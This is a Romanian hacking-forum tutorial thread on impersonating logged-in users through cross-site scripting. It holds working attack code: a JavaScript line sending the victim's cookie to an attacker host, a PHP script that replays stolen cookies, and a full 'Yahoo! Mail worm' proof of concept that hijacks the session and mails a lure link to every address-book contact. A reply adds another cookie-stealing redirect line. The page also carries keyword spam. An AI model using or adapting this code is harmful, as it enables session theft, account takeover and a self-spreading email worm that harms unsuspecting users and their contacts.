Atacul XSS de impersonare

www.Hacking-Romania.com
Hacking, gaby hacker team, programe hack, radmin hack, hi5 hack, hack the west, hacking romania, hacking stuff, hacking tools, 1 hack, 1st hacks, 2 hack, 2 hacks, 3 hack, 3 hacks, 3000 hack, 3004 hack, 4 hack, 4 hacks, 55 hack, 6 hack, 6 hacks, 7 hack, 7 hacks, 9 hack, 9dragons hack, a hack, adventure quest hack, aim hack, alz hack, and hacks, best hack, blue hack, bots hack, bots hacks, buy hack, cabal online hack, chaos hacks, cheat engine hack, cheat hack, cheats and hacks, cheats hacks, city hack, club hack, combo hack, conquer hacks, conquer online hack, conquer online hacks, conquer speed hack, conquiztador hack, counter strike 1.6 hack, damage hack, de hack, download hack, download hack for, dragonfable hack, dragonfable hacks, drakkarious hack, exp hack, flyff hack, free hack, free hacks, game hack, game hacks, garena exp hack, gladiatus hack, gm hack, gold hack, gunz hack, hack, hack 5, hack a pc, hack a site, hack a website, hack blog, hack conquer, hack counter strike, hack crack, hack cs, hack cs 1.6, hack dvd, hack email, hack forum, hack hunter, hack id, hack info, hack it, hack mess, hack muonline, hack net, hack password, hack passwords, hack pc, hack pdf, hack programs, hack site, hack sites, hack soft, hack software, hack team, hack the game, hack this, hack website, hack windows xp, hack world, hack xp, hacked, hacking, hacking game, hacking programs, hacking software, hacking tutorials, hacks, how hack, how to hack, icon hack, last chaos hack, last chaos hacks, life hack, lineage 2 hack, lineage 2 hacks, linux hack, lvl hack, maplestory hacks, mobile hack, multi hack 3.0, mybrute hack, naruto arena hack, naruto arena hacks, one hit kill hack, online hacks, perfect world hacks, pool hack, programe hack, resolution hack, resource hack, roll hack, royal hack, silkroad hack, source hack, speed hack, speed hacks, super hack, the west hack, warrock hack, warrock hacks, web hack, xpango hack, lockerz forum

Lista Forumurilor Pe Tematici

www.Hacking-Romania.com | Reguli | Inregistrare | Login

POZE WWW.HACKING-ROMANIA.COM

Nu sunteti logat.

Nou pe simpatie:
dany_frumusik

Femeie
24 ani
Constanta
cauta Barbat
24 - 56 ani

www.Hacking-Romania.com / Tutoriale Hack RO / Atacul XSS de impersonare

Autor

Mesaj

Pagini: 1

948Y-H4(K3R
☻ADM!N☻

Inregistrat: acum 16 ani
Postari: 2716

PARTEA 1: Descriere

Folosind atacuri Cross Site Scripting(XSS) devine posibila impersonarea unui utilizator
legitim(victima) care este autentificata pe un website(tinta)

In acest document vom presupune ca site-ul tinta are o vulnerabilitate XSS
care ii permite unui atacator sa injecteze cod rau intentionat intr-o pagina.

Aceasta este secventa de pasi implicate in acest tip de atac

1. Victima se autentifica pe site-ul tinta
2. Atacatorul ii trimite victimei un link spre o pagina(continand cod rau intentionat)
de pe site-ul tinta
3. Victima navigheaza catre pagina
4. Codul continut in acea pagina incarca un script din alta locatie trimitand spre
acesta si cookiul victimei
5. Scriptul foloseste acest cookie pozand drept victima pe site-ul tinta

Exemplificare:

Presupunem ca victima este deja autentificata pe site-ul tinta

Tinta are o vulnerabilitate XSS de forma

Atacatorul ii trimite victime link-ul
"http://www.tinta.com/pagina.php?var="

Atuncti cand victima urmeaza linkul scriptul "js.js" este incarcat si executat de browserul acestuia

===== js.js =====

new Image().src='http://www.atacator.com/php.php?cookie= '+escape(documentˇcookie);

=================

Fisierul "js.js" contine un cod care face un request catre fisierul "php.php" de asemenea
controlat de atacator

===== php.php =====

$domain=".target.com"; // domeniul pentru cookie

$cookie=$_GET['cookie'];

//creeam fisierul cookie presupunand ca cookiul sesiunii are mai multe secvente "nume=valoare; "

$hcook=fopen("cookie.txt","w");
$params=split('; ',$cookie);
for($i=0; $i
{
$eqpos=strpos($params[$i],"=");
$name =substr($params[$i],0,$eqpos);
$value=substr($params[$i],$eqpos+1,strlen($params[$i]));
fwrite($hcook,$domain. " TRUE / FALSE 9999999999 ".$name." ".$value." ");
}
fclose($hcook);

// facem orice request curl folosind "cookie.txt" ca CURLOPT_COOKIEFILE si CURLOPT_COOKIEJAR

?>

Fisierul "php.php" este esenta acestui tip de atac.
Acesta ia cookie-ul victimei si il foloseste incat se poate da drept victima
pe site-ul tinta
Motivul folosiri unui script php in locul unuia javascript este acela ca in acest mod
putem trece de politica aceleiasi origini a javascriptului avand posibilitatea de
a face requesturi catre ORICE domeniu unde cookie-ul este valid
Mai mult putem primi si trimite date catre site-ul tinta manipulandu-le in orice mod.

>>PARTEA 2: Vierme Yahoo! Mail PoC

Presupunem ca Yahoo! are o vulnerabilitate XSS de forma "http://xxx.yahoo.com/pagina?var="

1. Atacatorul ii trimite victimei un email continand un link catre
2. Victima urmeaza link-ul
3. Fisierul "worm.php" ii fura victimei cookie-ul si folosindu-se de el trimite un email
catre toate persoanele din Address Book-ul victimei
4. Persoanele din Address Book devin la randul lor victime atunci cand urmeaza link'ul
din emailul trimis de vierme care aparent vine de la victima

===== worm.php =====

$subject="Link pentru tine"; // subiectul mesajului
$message ="Uite un link cool: click me"; // corpul mesajului

// eliminam nevoia de a folosi un fisier "js.js" verificand valoare parametrului "cookie"
// daca nu exista tiparim continutul fisierului "js.js"
// iara daca exista continuam cu codul "php.php"

if(!isset($_GET['cookie']))
{
$scripturl="http://".$HTTP_HOST.$REQUEST_URI;
print("new Image().src='".$scripturl."?cookie='+escape(documentˇcookie);");
}
else
{
$cookie=$_GET['cookie'];

// cream un nume unic de fisier unde sa salvam cookiul asigurandu'ne astfel
// ca atunci cand mai multe victime acceseaza simultan scriptul cookie'urile
// lor nu se vor incurca
$cookiefile=rand(100,999).".txt";

// creeam fisierul cookie

$hcook=fopen($cookiefile,"w");
$params=split('; ',$cookie);
for($i=0; $i
{
$eqpos=strpos($params[$i],"=");
$name =substr($params[$i],0,$eqpos);
$value= substr($params[$i],$eqpos+1,strlen($params[$i]));
fwrite($hcook,".yahoo.com TRUE / FALSE 9999999999 ".$name." ".$value." ");
}
fclose($hcook);

// incarcam address book'ul Yahoo! pentru a extrage datele despre contacte si a crea o variabila
// de forma " , , etc.." ,de asemenea gasirea domeniului
// us.fXXX.mail.yahoo.com care se schimba la fiecare autentificare

$address=curl("http://address.mail.yahoo.com/","",$cookiefile);
if(strpos($address,"Yahoo! Address Book")==true) // daca pagina a fost incarcata corect
{
$apage=explode(" ",$address);
foreach($apage as $line_num => $aline)
{
if(strstr($aline,"ymsgr:sendIM"))
{
$ex =explode("?",$aline);
$ex2=explode(""",$ex[1]);
$id=$ex2[0];
$to=$to.$ex2[0]."@yahoo.com,";
}
if(strstr($aline,"Compose"))
{
$ex3=explode("/",$aline);
$domain="http://".$ex3[2];
}
}
}

// incarcam formularul "Compose" aflat pe us.fXXX.mail.yahoo.com pentru a gasi actiunea formularului
// de trimitere email si valoarea parametrului ".crumb" de care avem nevoie pentru a trimite mesajele

if(strlen($to)>0 && strlen($domain)>0) // daca avem cele doua variabile
{
$compose= curl($domain."/ym/Compose?","",$cookiefile);
if(strpos($compose,"Yahoo! Mail")==true) // daca pagina a fost incarcata corect
{
$cpage=explode(" ",$compose);
foreach($cpage as $line_num => $cline)
{
if(strstr($cline,"form name="Compose""))
{
$ex4=explode(""",$cline);
$action=$ex4[5];
}
if(strstr($cline,".crumb"))
{
$ex6=explode(""",$cline);
$crumb=$ex6[3];
}
}
}

if(strlen($action)>0 && strlen($crumb)>0) // daca avem cele doua variabile
{

$subject=str_replace(" ","+",$subject);
$message=str_replace(" ","+",$message);

// generam POSTFIELDS pentru curl

$post ="SEND=1&SD=&SC=&CAN=&docCharset= iso-8859-1&PhotoMailUser=&PhotoToolInstall=&";
$post.="OpenInsertPhoto=&PhotoGetStart= 0&SaveCopy=no&PhotoMailInstallOrigin=&";
$post.="box=&.crumb=".$crumb."&";
$post.="FwdFile=&FwdMsg=&FwdSubj=&FwdInline= &OriginalFrom=&OriginalSubject=&";
$post.="InReplyTo=&NumAtt=0&AttData=&UplData= &OldAttData=&OldUplData=&FName=&";
$post.="ATT=&VID=&Markers=&NextMarker= 0&Thumbnails=&PhotoMailWith=&BrowseState=&";
$post.="PhotoIcon=&ToolbarState=&VirusReport= &Attachments=&BGRef=&BGDesc=&BGDef=&";
$post.="BGFg=&BGFF=&BGFS=&BGSolid=&BGCustom= &PlainMsg=&PhotoFrame=&PhotoPrintAtHomeLink=&";
$post.="PhotoSlideShowLink=&PhotoPrintLink= &PhotoSaveLink=&PhotoPermCap=&PhotoPermPath=&";
$post.="PhotoDownloadUrl=&PhotoSaveUrl= &PhotoFlags=&start=compose&bmdomain=&hidden=showcc&";
$post.="showbcc=&AC_Done=&AC_ToList= &AC_CcList=&AC_BccList=&sendtop=Send&";
$post.="savedrafttop=Save+as+a+Draft&canceltop= Cancel&To=".$to."&Cc=&Bcc=&";
$post.="Subj=".$subject."&Body=".$message."&Format= html&SigAtt=1&sendbottom=Send&";
$post.="savedraftbottom=Save+as+a+Draft&cancelbottom=Cancel&";

// trimitem mailurile
$mail=curl($domain.$action,$post,$cookiefile);

}
}
unlink($cookiefile);
}

function curl($url,$post='',$cookiefile) // functie pentru usurarea request'urilor curl
{
$rand=rand(100000,400000);
$agent="Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.4) Gecko/".$rand." Netscape/7.1 (ax)";
$ch=curl_init();
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_USERAGENT,$agent);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
if($post!=='')
{
curl_setopt($ch,CURLOPT_POST,1);
curl_setopt($ch,CURLOPT_POSTFIELDS,$post);
}
curl_setopt($ch,CURLOPT_COOKIEFILE,$cookiefile);
curl_setopt($ch,CURLOPT_COOKIEJAR,$cookiefile);
curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,FALSE);
$result=curl_exec($ch);
curl_close($ch);
if($result=="") { curl($url,$post); } else { return $result; }
}

?>

===================

Impactul acestui tip de vierme poate fi urias avand in vedere ca mesajul email trimis de vierme
pare ca vine de la o persoana pe care victima o cunoaste si in care are incredere. [ Varianta TX

pus acum 15 ani

wildchild
Moderator

Inregistrat: acum 15 ani
Postari: 223

is de fapt mai multe aplicatii intr-una singura.genial.

_______________________________________
decedat

pus acum 15 ani

danuhack
MEMBRU SPECIAL

Din: '"test
Inregistrat: acum 15 ani
Postari: 447

Nu este necesara o vurnerabilitate web trimiti victimei un mail html <script>document.location("http://sittutau.com/stealcookie.php"

</script> acesta va face request cand va deschide mailu

"Sa zicem ca yahoo are o vurnerabilitate xss "
Nu cred ca o sa vezi asa ceva

Modificat de danuhack (acum 13 ani)

_______________________________________
[img]http://i220.photobucket.com/albums/dd214/CatalynCN/bnr_bancnota_zero_0_lei_ron_1266581.jpg[/img]

pus acum 13 ani

Pagini: 1

Mergi la